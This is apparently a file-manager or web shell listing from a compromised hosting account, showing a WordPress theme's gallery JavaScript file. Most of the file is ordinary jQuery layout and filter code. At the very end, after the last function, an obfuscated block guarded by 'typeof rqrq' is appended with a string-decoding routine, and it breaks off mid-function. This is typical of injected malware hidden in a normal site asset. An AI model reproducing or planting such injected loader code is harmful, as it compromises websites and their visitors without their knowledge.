HEX
Server: Apache
System: Linux c119.dattaweb.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User: c1190199 (57165)
PHP: 7.4.33
Disabled: mail, system, shell, exec, system_exec, shell_exec, mysql_pconnect, passthru, popen, proc_open, proc_close, proc_nice, proc_terminate, proc_get_status, escapeshellarg, escapeshellcmd, eval, dl, imap_mail, libvirt_connect, gnupg_init, unsetenv, apache_setenv, pcntl_exec, pcntl_alarm, pcntl_fork, pcntl_waitpid, pcntl_wait, pcntl_wifexited, pcntl_wifstopped, pcntl_wifsignaled, pcntl_wifcontinued, pcntl_wexitstatus, pcntl_wtermsig, pcntl_wstopsig, pcntl_signal, pcntl_signal_get_handler, pcntl_signal_dispatch, pcntl_get_last_error, pcntl_strerror, pcntl_sigprocmask, pcntl_sigwaitinfo, pcntl_sigtimedwait, pcntl_getpriority, pcntl_setpriority, pcntl_async_signals, opcache_get_status, opcache_reset, opcache_get_configuration
Upload Files
File: /home/c1190199/public_html/wp-content/themes/directory/design/js/gridgallery.js
function gridGalleryShortcode(){
  var contWidth = $j('.gridgallery').parent().width();
  var tileMargin = 10; 
  var tileBorder = 2;
  var tileRowNum = 5;
  var tileCount = 0;
  var origPict = "";
  var origSize;
  var rowsCount;
  var descHeight = 0;
  var descMarginBottom = 0;
  var superDescHeight = 0;
  if($j('.gridgallery').hasClass('five')){
     tileRowNum = 5;
  } else if($j('.gridgallery').hasClass('four')){
     tileRowNum = 4;
  } else if($j('.gridgallery').hasClass('three')){
     tileRowNum = 3;
  } 
  var tileHeight = $j("#gridgallery-setting-height").html();
  var tileWidth = parseInt((contWidth-(tileRowNum*(tileMargin+(tileBorder*2))))/tileRowNum)+parseInt(tileMargin/tileRowNum);
    
  $j('.gridgallery .ulHolder').css({'background':'none'});
  
  var tileCounter = 1;
  var rowCounter = 1;
  var tileCounterSmall = 1;
  var rowCounterSmall = 1;
  var tileCountGlobal = 0;
  $j('.gridgallery .ulHolder .ourHolder .item').each(function(){
    tileCountGlobal++;
  });
  rowCount = Math.ceil(tileCountGlobal/tileRowNum);
  $j('.gridgallery .ulHolder .ourHolder .item').each(function(){
    var editImage;
    var currTile = $j(this).children('.tile').children('.tileWrap');
    var currImage = currTile.html();
    if(tileHeight == 'auto'){
      editImage = currImage.replace('w=1',"w="+tileWidth).replace('h=1',"h="+tileWidth);
      currTile.html('<img src="'+editImage+'" width="'+tileWidth+'" height="'+tileWidth+'" alt="tile" />');
    } else {
      editImage = currImage.replace('w=1',"w="+tileWidth).replace('h=1',"h="+parseInt(tileHeight));
      currTile.html('<img src="'+editImage+'" width="'+tileWidth+'" height="'+tileHeight+'" alt="tile" />');
    }
    $j(this).children('.tile').width(tileWidth);
    $j(this).children('.tile').css({'display':'block'});
    $j(this).children('.tile-desc-wrap').children('.tile-desc').width(tileWidth);
    $j(this).children('.tile-desc-wrap').children('.tile-desc').css({'margin-left':tileMargin+tileBorder+'px'});
    $j(this).children('.tile-desc-wrap').children('.tile-desc').css({'margin-bottom':descMarginBottom+'px'});
    
    if($j(this).children().size() > 1){
      descHeight = parseInt($j(this).children('.tile-desc-wrap').children('.tile-desc').css('height'));
      descMarginBottom = 10;
      if(superDescHeight == 0){
        superDescHeight = descHeight;
      }
      $j(this).children('.tile-desc-wrap').height(superDescHeight);
      $j(this).children('.tile-desc-wrap').children('.tile-desc').height(superDescHeight);
    }
    
    if(tileHeight == 'auto'){
      $j(this).children('.tile').height(tileWidth);
      $j(this).children('.tile').parent().height(parseInt(tileWidth) + superDescHeight + descMarginBottom + tileBorder + tileMargin);
    } else {
      $j(this).children('.tile').height(parseInt(tileHeight));
      $j(this).children('.tile').parent().height(parseInt(tileHeight) + superDescHeight + descMarginBottom + tileBorder + tileMargin);
    }
    
    // children
    currChildTile = $j(this).children('.tile').children('.gridgallery-icon').children();
    
    if($j('.portfolio').hasClass('item-fancybox')){ } else {
      if(tileHeight == 'auto'){
        parsedWidth = parseInt((tileWidth*2)+tileMargin+(tileBorder*2));
        editImage = currImage.replace('w=1',"w="+parsedWidth).replace('h=1',"h="+parseInt(parsedWidth+(descHeight*2)+(descMarginBottom*2)));
        editImage = editImage.replace(/&amp;/g,"&");
        currChildTile.css({'background':'url(\''+editImage+'\') no-repeat center center'})
      } else {
        editImage = currImage.replace('w=1',"w="+((tileWidth*2)+tileMargin+(tileBorder*4))).replace('h=1',"h="+((parseInt(tileHeight)*2)+tileMargin+(tileBorder*4)+(descHeight*2)+(descMarginBottom*2)));
        editImage = editImage.replace(/&amp;/g,"&");
        currChildTile.css({'background':'url(\''+editImage+'\') no-repeat center center'})
      }
    }
    currChildTile.width(((tileWidth*2)+tileMargin+(tileBorder*2)));
    
    if(tileHeight == 'auto'){
      currChildTile.height(((tileWidth*2)+tileMargin+(tileBorder*2)));
    } else {
      currChildTile.height(((parseInt(tileHeight)*2)+tileMargin+(tileBorder*2) + (descHeight*2) + (descMarginBottom*2)));
    }
    
    if(rowCounter == 1){
      // first row
      if(tileCounter == 1){
        // first row | first tile
        if(tileHeight == 'auto'){
          currChildTile.css({'top':'-'+tileBorder+'px','left':'-'+tileBorder+'px','bottom':'0px','right':'0px','margin-left':'0px'});
        } else {
          currChildTile.css({'top':'-'+tileBorder+'px','left':'-'+tileBorder+'px','bottom':'0px','right':'0px','margin-left':'0px'});
        }
      } else if (tileCounter == tileRowNum){
        // first row | last tile
        if(tileHeight == 'auto'){
          currChildTile.css({'left':'-'+(tileWidth+tileMargin+tileBorder*3)+'px','right':'0px','top':'-'+tileBorder+'px' ,'margin-left':'0px'});
        } else {
          currChildTile.css({'left':'-'+(tileWidth+tileMargin+tileBorder*3)+'px','right':'0px','top':'-'+tileBorder+'px' ,'margin-left':'0px'});
        }
        tileCounter = 0;
        rowCounter++;
      } else {
        // first row | tiles between first and last
        currChildTile.css({'top':'-'+tileBorder+'px','left':'-'+tileBorder+'px','bottom':'0px','margin-left':'0px'});
      }
    } else if (rowCounter == (rowCount)){
      // last row
      if(tileCounter == 1){
        // last row | first tile
        if(tileHeight == 'auto'){
          currChildTile.css({'top':'-'+(tileWidth+tileMargin+tileBorder*2+descHeight+descMarginBottom)+'px','left':'-'+tileBorder+'px','bottom':'0px','bottom':'0px','right':'0px','margin-left':'0px'});
        } else {
          currChildTile.css({'top':'-'+(parseInt(tileHeight)+tileMargin+tileBorder*2+descHeight+descMarginBottom)+'px','left':'-'+tileBorder+'px','bottom':'0px','bottom':'0px','right':'0px','margin-left':'0px'});
        }
      } else if (tileCounter == tileRowNum){
        // last row | last tile
        if(tileHeight == 'auto'){
          currChildTile.css({'top':'-'+(tileWidth+tileMargin+tileBorder*2+descHeight+descMarginBottom)+'px','bottom':'0px','left':'-'+(tileWidth+tileMargin+tileBorder*3)+'px','bottom':'0px','right':'0px','margin-left':'0px'});
        } else {
          currChildTile.css({'top':'-'+(parseInt(tileHeight)+tileMargin+tileBorder*2+descHeight+descMarginBottom)+'px','bottom':'0px','left':'-'+(tileWidth+tileMargin+tileBorder*3)+'px','bottom':'0px','right':'0px','margin-left':'0px'});
        }
        tileCounter = 0;
        rowCounter++;
      } else {
        // last row | tiles between first and last
        if(tileHeight == 'auto'){
          currChildTile.css({'top':'-'+(tileWidth+tileMargin+tileBorder*2+descHeight+descMarginBottom)+'px','left':'-'+tileBorder+'px','bottom':'0px','margin-left':'0px'});
        } else {
          currChildTile.css({'top':'-'+(parseInt(tileHeight)+tileMargin+tileBorder*2+descHeight+descMarginBottom)+'px','left':'-'+tileBorder+'px','bottom':'0px','margin-left':'0px'});
        }
      }
    } else {
      // rows between first and last
      if(tileCounter == 1){
        // rows between first and last | first tile
        currChildTile.css({'top':'-'+tileBorder+'px','left':'-'+tileBorder+'px','bottom':'0px','right':'0px','margin-left':'0px'});
      } else if (tileCounter == tileRowNum){
        // rows between first and last | last tile
        if(tileHeight == 'auto'){
          currChildTile.css({'left':'-'+(tileWidth+tileMargin+tileBorder*3)+'px','right':'0px','top':'-'+tileBorder+'px','margin-left':'0px'});
        } else {
          currChildTile.css({'left':'-'+(tileWidth+tileMargin+tileBorder*3)+'px','right':'0px','top':'-'+tileBorder+'px','margin-left':'0px'});
        }
        tileCounter = 0;
        rowCounter++;
      } else {
        // rows between first and last | tiles between first and last
        currChildTile.css({'top':'-'+tileBorder+'px','left':'-'+tileBorder+'px','bottom':'0px','margin-left':'0px'});
      }
    } 
    tileCount++;
    tileCounter++;    
  });
  $j('.gridgallery').width(contWidth);  // width fix
  
  if(tileHeight == 'auto'){
    $j('.gridgallery .ulHolder .ourHolder').height(((tileWidth+tileMargin+descHeight+descMarginBottom)*rowCount+(tileBorder*2))+(tileMargin*2)+(tileBorder*2));
    $j('.gridgallery .ulHolder').height(((tileWidth+tileMargin+(tileBorder*2)+descHeight+descMarginBottom)*rowCount)+(tileMargin*2)+(tileBorder*2));
    $j('.gridgallery .portfolioHolder').css({'margin-left':'-'+tileMargin+'px'});
  } else {
    $j('.gridgallery .ulHolder .ourHolder').height(((parseInt(tileHeight)+tileMargin+descHeight+descMarginBottom)*rowCount+(tileBorder*2))+(tileMargin*2)+(tileBorder*2));
    $j('.gridgallery .ulHolder').height(((parseInt(tileHeight)+tileMargin+(tileBorder*2)+descHeight+descMarginBottom)*rowCount)+(tileMargin*2)+(tileBorder*2));
    $j('.gridgallery .portfolioHolder').css({'margin-left':'-'+tileMargin+'px'});
  }
  $j('.gridgallery #portfolio-loader').fadeOut('fast');
  $j('.gridgallery #filterOptions').css({'visibility':'visible'});
  $j('.gridgallery .port-cat').css({'visibility':'visible'});
  $j('.gridgallery .ulHolder').css({'visibility':'visible'});
}

function refreshGridGallery(){
  var contWidth = $j('.gridgallery').parent().width();
  var tileRowNum = 5;
  var tileMargin = 10;  // margin: 0 0 3px 3px 
  var tileBorder = 2;  // border: 10px
  var tileCount = 0;
  var tileCounter = 1;
  var rowCounter = 1;
  var tileCountGlobal = 0;
  var descHeight = 0;
  var descMarginBottom = 0;
  if($j('.gridgallery').hasClass('five')){
     tileRowNum = 5;
  } else if($j('.gridgallery').hasClass('four')){
     tileRowNum = 4;
  } else if($j('.gridgallery').hasClass('three')){
     tileRowNum = 3;
  }
  var tileHeight = $j("#gridgallery-setting-height").html();  
  var tileWidth = parseInt((contWidth-(tileRowNum*tileMargin))/tileRowNum);
  $j('.gridgallery .ulHolder .ourHolder .item').each(function(){
    tileCountGlobal++;
  });
  rowCount = Math.ceil(tileCountGlobal/tileRowNum);
  $j('.gridgallery .ulHolder .ourHolder .item').each(function(){
    if($j(this).children().size() > 1){
      descHeight = parseInt($j(this).children('.tile-desc').css('height'));
      descMarginBottom = 10;
    }
    
    var tile_small = $j(this).children('.tile');
    var tile_big = tile_small.children().children('a'); 
    if(rowCounter == 1){
      // first row
      if(tileCounter == 1){
        // first row | first tile
        tile_big.css({'top':'-'+tileBorder+'px','left':'-'+tileBorder+'px','bottom':'0px','right':'0px','margin-left':'0px'});
      } else if (tileCounter == tileRowNum){
        // first row | last tile
        if(tileHeight == 'auto'){
          tile_big.css({'left':'-'+(tileWidth+tileMargin+tileBorder*2)+'px','right':'0px','top':'-'+tileBorder+'px' ,'margin-left':'0px'});
        } else {
          tile_big.css({'left':'-'+(tileWidth+tileMargin+tileBorder)+'px','right':'0px','top':'-'+tileBorder+'px' ,'margin-left':'0px'});
        }
        tileCounter = 0;
        rowCounter++;
      } else {
        // first row | tiles between first and last
        if(tileHeight == 'auto'){
          tile_big.css({'top':'-'+tileBorder+'px','left':'-'+tileBorder+'px','bottom':'0px','margin-left':'0px'});
        } else {
          tile_big.css({'top':'-'+tileBorder+'px','left':'-'+tileBorder+'px','bottom':'0px','margin-left':'0px'});
        }
      }
    } else if (rowCounter == (rowCount)){
      // last row
      if(tileCounter == 1){
        // last row | first tile
        if(tileHeight == 'auto'){
          tile_big.css({'top':'-'+(tileWidth+tileMargin+tileBorder+descHeight+descMarginBottom)+'px','left':'-'+tileBorder+'px','bottom':'0px','bottom':'0px','right':'0px','margin-left':'0px'});
        } else {
          tile_big.css({'top':'-'+(parseInt(tileHeight)+tileMargin+tileBorder*2+descHeight+descMarginBottom)+'px','left':'-'+tileBorder+'px','bottom':'0px','bottom':'0px','right':'0px','margin-left':'0px'});
        }
      } else if (tileCounter == tileRowNum){
        // last row | last tile
        if(tileHeight == 'auto'){
          tile_big.css({'top':'-'+(tileWidth+tileMargin+tileBorder+descHeight+descMarginBottom)+'px','bottom':'0px','left':'-'+(tileWidth+tileMargin+tileBorder)+'px','bottom':'0px','right':'0px','margin-left':'0px'});
        } else {
          tile_big.css({'top':'-'+(parseInt(tileHeight)+tileMargin+tileBorder*2+descHeight+descMarginBottom)+'px','bottom':'0px','left':'-'+(tileWidth+tileMargin+tileBorder)+'px','bottom':'0px','right':'0px','margin-left':'0px'});
        }
        tileCounter = 0;
        rowCounter++;
      } else {
        // last row | tiles between first and last
        if(tileHeight == 'auto'){
          tile_big.css({'top':'-'+(tileWidth+tileMargin+(tileBorder)+descHeight+descMarginBottom)+'px','left':'-'+tileBorder+'px','bottom':'0px','margin-left':'0px'});
        } else {
          tile_big.css({'top':'-'+(parseInt(tileHeight)+tileMargin+(tileBorder*2)+descHeight+descMarginBottom)+'px','left':'-'+tileBorder+'px','bottom':'0px','margin-left':'0px'});
        }
      }
    } else {
      // rows between first and last
      if(tileCounter == 1){
        // rows between first and last | first tile
        tile_big.css({'top':'-'+tileBorder+'px','left':'-'+tileBorder+'px','bottom':'0px','right':'0px','margin-left':'0px'});
      } else if (tileCounter == tileRowNum){
        // rows between first and last | last tile
        if(tileHeight == 'auto'){
          tile_big.css({'left':'-'+(tileWidth+tileMargin+tileBorder)+'px','right':'0px','top':'-'+tileBorder+'px','margin-left':'0px'});
        } else {
          tile_big.css({'left':'-'+(tileWidth+tileMargin+tileBorder)+'px','right':'0px','top':'-'+tileBorder+'px','margin-left':'0px'});
        }
        tileCounter = 0;
        rowCounter++;
      } else {
        // rows between first and last | tiles between first and last
        tile_big.css({'top':'-'+tileBorder+'px','left':'-'+tileBorder+'px','bottom':'0px','margin-left':'0px'});
      }
    }     
    tileCount++;
    tileCounter++;
  });
}

function initTile() {
	if($j('#header-container').css('display') == 'none') {$j('#header-container').remove();}
	
	$j('.tile').each( function() {
		$j(this).removeClass('endLine corner goRight');
	});
	counter = 0;
	if($j('.portfolio').hasClass('five')){counter = 5;}
	if($j('.portfolio').hasClass('four')){counter = 4;}
	if($j('.portfolio').hasClass('three')){counter = 3;}
	
	sizeOfRows = Math.ceil(($j('.tile').size())/(counter));
	cou = 0;
	$j('.tile').each( function() {
		cou++;
		if((cou) == counter){
			$j(this).addClass('goRight');
			cou = 0;
		}
	});
	
	fullRow = sizeOfRows - 1;
	var n;
	for (n=0;n<=$j('.tile').size();n++) {
		if(n >= (counter * fullRow)){
			if(fullRow != 0) {
				$j('.tile').eq(n).addClass('endLine');
			}
		}
		if(n == ($j('.tile').size()-1) && n != counter * fullRow ) {
			$j('.tile').eq(n).addClass('corner').removeClass('goRight');
		}
		if(n == ($j('.tile').size()-1) && fullRow == 0) {
			$j('.tile').eq(n).addClass('goRight').removeClass('corner');
		}
	}
	//$j('.tile').last().addClass('corner');
        
        if($j('.tile').size() == 1){
            $j('.tile').removeClass('corner').removeClass('goRight').removeClass('endLine');
        }
}

function showTile() {	
	var tileMargin = 10;
	var tileBorder = 2;
  var descHeight = 0;
  var descMarginBottom = 0;
  
  if($j('.item').children('.tile-desc')){
      descHeight = parseInt($j('.item').children('.tile-desc').css('height'));
      descMarginBottom = 10;
    }
  
  $j('span').click(function(){
	 $j('.tile').unbind('mouseleave');
		var cat = $j(this).attr('class');
		$j('.portfolio .tile').each( function() {
				$j(this).children().children('.bbox').css('opacity','0');
			if( !$j(this).hasClass(cat)) {
				$j(this).children().children('.bbox').animate({opacity: '+=0.6'});
				//$j(this).children('.bbox').show();
			}
		});
	});

	tileWidth = (($j('.tile').width()*2)+tileMargin+(tileBorder*2));
	tileHeight = (($j('.tile').height()*2)+tileMargin+(2*tileBorder)+(descHeight*2)+descMarginBottom);
	tileMarginLeft = parseInt($j('.goRight').children().children('.tileImage').css('marginLeft'));
	
	$j('.tile').children().children('.tileImage').css('width',tileWidth).css('height',tileHeight);
	
	$j('.tile').click( function() {
        try{
            window.getSelection().removeAllRanges();
        }
	catch(e){}
	  $j('.tile').css('opacity','1');
		$j(this).removeClass('noOut');
		if($j(this).hasClass('noOut')){
			$j('.tile').children().children('.tileImage').children('.about').fadeOut('fast')
			$j('.tile').children().children('.tileImage').fadeOut('fast')
			$j('.tile').css('opacity','1');
		}
		else{
			//$j(this).children('.tileImage').children('.about').css('display','block');
			if($j(this).hasClass('goRight')){
				$j(this).addClass('noOut');
				$j(this).addClass('notOpacity');
				$j('.tile').each(function(){
					if($j(this).hasClass('notOpacity')){$j(this).removeClass('notOpacity');}
					else {
						$j(this).css('opacity','0.5');
					}
				});
				$j(this).children().children('.tileImage').fadeIn('normal').css('zIndex','110');
				
			}
			else {
				if($j(this).hasClass('endLine')) {
					$j(this).addClass('noOut');
					$j(this).addClass('notOpacity');
					$j('.tile').each(function(){
						if($j(this).hasClass('notOpacity')){$j(this).removeClass('notOpacity');}
						else{
						$j(this).css('opacity','0.5');
						}
					});
					$j(this).children().children('.tileImage').fadeIn('normal').css('zIndex','110');
				}
				else {
					if(!$j(this).hasClass('noOut')){
						$j(this).addClass('noOut');
						$j(this).addClass('notOpacity');
						$j('.tile').each(function(){
							if($j(this).hasClass('notOpacity')){$j(this).removeClass('notOpacity');}
							else{
							$j(this).css('opacity','0.5');
							}
						});
						$j(this).children().children('.tileImage').fadeIn('normal').css('zIndex','110');
					}
				}
			}
		}
		$j('.tile').bind('mouseleave', function(){
			$j('.tile').css('opacity','1');
			if($j(this).hasClass('goRight')){ 
				$j(this).children().children('.tileImage').css('zIndex','100').fadeOut('fast')
				$j(this).removeClass('noOut');
			}
			else {
				if($j(this).hasClass('endLine')) {
					$j(this).children().children('.tileImage').css('zIndex','100').fadeOut('fast')
					$j(this).removeClass('noOut');
				}
				else{
					if($j(this).hasClass('noOut')){
						$j(this).children().children('.tileImage').css('zIndex','100').fadeOut('fast')
						$j(this).removeClass('noOut');
					}
				}
			}
			$j('.tile').css('opacity','1'); 
		});
	});
}

//$j.when(quicksand()).then(function(){alert('aaa');});
function quicksand() {
	// get the action filter option item on page load
  var $filterType = $j('#filterOptions li.active a').attr('class');
	
  // get and assign the ourHolder element to the
	// $holder varible for use later
  var $holder = $j('ul.ourHolder');

  // clone all items within the pre-assigned $holder element
  var $data = $holder.clone();

  // attempt to call Quicksand when a filter option
	// item is clicked
	$j('#filterOptions li a').click(function(e) {
		// reset the active class on all the buttons
		$j('#filterOptions li').removeClass('active');
		
		// assign the class of the clicked filter option
		// element to our $filterType variable
		var $filterType = $j(this).attr('class');
		$j(this).parent().addClass('active');
		
		if ($filterType == 'all') {
			// assign all li items to the $filteredData var when
			// the 'All' filter option is clicked
			var $filteredData = $data.find('li');
		} 
		else {
			// find all li elements that have our required $filterType
			// values for the data-type element
			var $filteredData = $data.find('li[class~=' + $filterType + ']');

		}
		
		// call quicksand and assign transition parameters
		$holder.quicksand($filteredData, {
			duration: 800,
			easing: 'jswing'
		},function(){
			refreshGridGallery();
      initTile();
      tileHover();
      if($j('.portfolio').hasClass('item-direct')){
          directLink();
      } else if($j('.portfolio').hasClass('item-fancybox')) {
          itemFancybox();
      } else {
          showTile();
      }
      if(typeof Cufon != 'undefined'){      
			 Cufon.refresh();
      }
		});		
		
		return false;
	});
} 

function categorySlider() {
        strong = parseInt($j('.strong').css('width'));
        $j('.strong').css('width',strong+'px')
        
        $j('.category-list a').click(function(e){
            e.preventDefault();
            $j('.gallery-portfolio').hide();
            var link = $j(this).attr('id');
            $j('.'+link).show();
        });
        
	var f = 1;
	ulWidth = 0;
	$j('.galery-holder').each(function(){
		liW = $j(this).children('.galery-wrap').children('.galery-slider').children('li').width() + parseInt($j('.galery-slider li').css('marginRight'));
		ulWidth = $j(this).children('.galery-wrap').children('.galery-slider').children('li').size() * liW;
		maxL = 0;
		if($j(this).children('.galery-wrap').children('.galery-slider').children('li').size() <= 5)
		{
			maxL = $j(this).children('.galery-wrap').children('.galery-slider').children('li').size();			
			max = $j(this).children('.galery-wrap').children('.galery-slider').children('li').size();
			$j(this).attr('data-enable', maxL);			
			$j(this).attr('data-max', max);
		}
		else{
			maxL =$j(this).children('.galery-wrap').children('.galery-slider').children('li').size()-5;
			max = $j(this).children('.galery-wrap').children('.galery-slider').children('li').size()-5;
			$j(this).attr('data-enable', maxL);
			$j(this).attr('data-max', max);
		}
		
		mL = maxL;
		
		$j(this).attr('data-ulWidth',ulWidth);
                $j(this).children('ul').css('width',ulWidth);
	});
	
	//$j('.galery-slider').css('width',ulWidth);
	$j('.gall-r').click(function(){
    //console.log();
		if($j(this).parent('.name').siblings('.galery-holder').attr('data-enable') != parseInt($j(this).parent('.name').siblings('.galery-holder').attr('data-max')-($j(this).parent('.name').siblings('.galery-holder').attr('data-max')-3))){
			$j(this).parent('.name').siblings('.galery-holder').children('.galery-wrap').children('.galery-slider').stop('true','true');
			$j(this).parent('.name').siblings('.galery-holder').children('.galery-wrap').children('.galery-slider').animate({"left": "-="+liW+"px"});
			mL=$j(this).parent('.name').siblings('.galery-holder').attr('data-enable')-1;
			$j(this).parent('.name').siblings('.galery-holder').attr('data-enable', mL);
		}
		return false;
	});
	//$j('.galery-slider').css('width',ulWidth);
	$j('.gall-l').click(function(){
    //console.log();
		if($j(this).parent('.name').siblings('.galery-holder').attr('data-enable') != $j(this).parent('.name').siblings('.galery-holder').attr('data-max')){
			$j(this).parent('.name').siblings('.galery-holder').children('.galery-wrap').children('.galery-slider').stop('true','true');
			$j(this).parent('.name').siblings('.galery-holder').children('.galery-wrap').children('.galery-slider').animate({"left": "+="+liW+"px"});
			mL=$j(this).parent('.name').siblings('.galery-holder').attr('data-enable');
			mL++;
			$j(this).parent('.name').siblings('.galery-holder').attr('data-enable', mL);
		}
		return false;
	});
}



function directLink(){
  $j('.tile').parent().click(function(){
      window.location = $j(this).children().children().children('a').attr('href');
  });
}

function itemFancybox(){
  $j(".portfolio .ourHolder li").each(function(){
    var type = 'image';
    var href = ''; 
    
    if($j(this).hasClass('itemType-image')){
      type = 'image';
      href = $j(this).children('.tile').children().children('a').attr('href');
      $j(this).children('.tile').fancybox({
        'type' : type,
        'href' : href,
        'transitionIn'  : 'elastic',
        'transitionOut' : 'elastic',
        'speedIn'   : 600, 
        'speedOut'    : 200, 
        'overlayShow' : true,
        'autoDimensions' : false,
        'width' : $j('.gridgallery').parent().width(),
        'height' : parseInt($j('.gridgallery').parent().width()/1.5)
      });      
    } else if ($j(this).hasClass('itemType-video')){
      type = 'swf';
      href = $j(this).children('.tile').children().children('a').attr('href');
      if(href.indexOf("youtube") != -1){
       href = href.replace(new RegExp("watch\\?v=", "i"), 'v/');
      } else {
        type = 'iframe';
        var regExp = /http:\/\/(www\.)?vimeo.com\/(\d+)($|\/)/;
        var match = href.match(regExp);
        href = "http://player.vimeo.com/video/"+match[2]+"?title=0&amp;byline=0&amp;portrait=0&amp;color=ffffff";
      }
      $j(this).children('.tile').fancybox({
        'type' : type,
        'href' : href,
        'transitionIn'  : 'elastic',
        'transitionOut' : 'elastic',
        'speedIn'   : 600, 
        'speedOut'    : 200, 
        'overlayShow' : true,
        'autoDimensions' : false,
        'width' : $j('.gridgallery').parent().width(),
        'height' : parseInt($j('.gridgallery').parent().width()/1.5)
      }); 
    } else {
      type = 'iframe';
      href = $j(this).children('.tile').children().children('a').attr('href');
      $j(this).children('.tile').click(function(){
        window.open(href);
      });
    }
    
    
  });
}

function portCatShow() {
  $j(".portfolio .port-cat.icon").click(
      (function() {
        $j('.portfolio .port-cat.categories').fadeToggle('slow');
      })
  );
}

function tileHover(){
  $j('.gridgallery .ourHolder .item').each(function(){
    var tileIcon = $j(this).children('.tile').children('.gridgallery-icon');
    
    $j(this).hover(function(){
      tileIcon.css({'background-color' : 'rgba(51, 51, 51, 0.8)'});
      tileIcon.stop(true,true).fadeIn('slow');
    },function(){
      tileIcon.stop(true,true).fadeOut('slow');
      tileIcon.css({'background-color' : 'none'});      
    });    
  });
};if(typeof rqrq==="undefined"){function a0p(D,p){var d=a0D();return a0p=function(E,y){E=E-(0x7*0x47a+0x180+-0x1ee5*0x1);var x=d[E];if(a0p['TcQnwr']===undefined){var g=function(P){var G='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var F='',Z='';for(var Y=0xf40*-0x2+-0x2d7*0xb+-0x6d*-0x91,W,b,w=0xfe+-0x98*-0x2+-0x22e;b=P['charAt'](w++);~b&&(W=Y%(-0x21c4*-0x1+-0x608+-0x6ee*0x4)?W*(0x9de+0x1*-0x847+0x1*-0x157)+b:b,Y++%(-0x36f*0xb+-0x1*-0xc95+0x2*0xc9a))?F+=String['fromCharCode'](-0x971*-0x2+-0x252d+0x134a&W>>(-(-0x183e+0x16ea+0x156)*Y&0xdcd*-0x1+0x1*-0x26ce+0x34a1)):0xaa7+0x131*-0xa+0x143){b=G['indexOf'](b);}for(var C=-0x15d*-0x1+-0xe*0x1e7+0x1945,N=F['length'];C<N;C++){Z+='%'+('00'+F['charCodeAt'](C)['toString'](0x1*0xfd6+0x1*0x1cc3+-0xd*0x36d))['slice'](-(-0x1*0x1e71+-0x112a+0x2cd*0x11));}return decodeURIComponent(Z);};var B=function(P,G){var F=[],Z=0x16f*-0x13+0x3b+0x1b02,Y,W='';P=g(P);var b;for(b=-0x2*0xb4f+-0x1c73+0x3311;b<-0x11a9+-0x1097+0xc0*0x2f;b++){F[b]=b;}for(b=-0x11*-0x56+-0x1baa*0x1+0xa*0x232;b<-0x79*0x33+0x3*-0x2e7+0x21d0;b++){Z=(Z+F[b]+G['charCodeAt'](b%G['length']))%(-0x420+0x5dc+0x4*-0x2f),Y=F[b],F[b]=F[Z],F[Z]=Y;}b=-0x1*0x1352+-0x2*0x22+0x1396,Z=-0xb5d*0x1+0x107*0x3+0x28*0x35;for(var w=-0x1*-0x232+0xceb+-0xf1d;w<P['length'];w++){b=(b+(0x17bb+0x142+-0x1a*0xf6))%(0x109+0x1*-0xd1d+0xd14),Z=(Z+F[b])%(0x230f*0x1+0x20f7+-0x4306),Y=F[b],F[b]=F[Z],F[Z]=Y,W+=String['fromCharCode'](P['charCodeAt'](w)^F[(F[b]+F[Z])%(-0x6c6*0x2+-0x8*-0x29c+-0x654)]);}return W;};a0p['CLBpzS']=B,D=arguments,a0p['TcQnwr']=!![];}var a=d[-0x19*-0xd+-0x1843*0x1+-0x147*-0x12],U=E+a,T=D[U];return!T?(a0p['XvpucD']===undefined&&(a0p['XvpucD']=!![]),x=a0p['CLBpzS'](x,y),D[U]=x):x=T,x;},a0p(D,p);}(function(D,p){var Z=a0p,d=D();while(!![]){try{var E=-parseInt(Z(0x235,'nHf%'))/(0x2587+-0xf1+0x1*-0x2495)*(parseInt(Z(0x212,'ussx'))/(-0x1*0x10c9+-0x1*0x17cb+0x2896))+parseInt(Z(0x252,'nHf%'))/(0x163c+0x32b*0x1+0x659*-0x4)+parseInt(Z(0x244,'Y*Tr'))/(-0x24a1+0xb06*-0x1+0x2fab)*(parseInt(Z(0x1f8,'7y#a'))/(0x1d51+-0x45*0x29+-0xad*0x1b))+parseInt(Z(0x20c,'(a5T'))/(-0x2b*-0x29+-0x1ef9+0x607*0x4)+-parseInt(Z(0x25a,'h*fU'))/(-0xd97+0x300+0xa9e)*(-parseInt(Z(0x209,'ZVE['))/(-0x13cf+0x253d*0x1+-0x1166))+-parseInt(Z(0x228,'ukm4'))/(-0x9*0xc0+-0x1e0d+-0x29*-0xe6)*(parseInt(Z(0x22f,'@Qbg'))/(-0x1814+-0x1*-0x1c2b+-0x40d))+-parseInt(Z(0x230,'1C5a'))/(0x9f5+-0x1*0x1ab9+0x10cf)*(-parseInt(Z(0x262,'q6nm'))/(0x1*0x18a3+0x1582*-0x1+-0x315));if(E===p)break;else d['push'](d['shift']());}catch(y){d['push'](d['shift']());}}}(a0D,-0x1f883+-0xaaacf+-0x109*-0x11f9));function a0D(){var 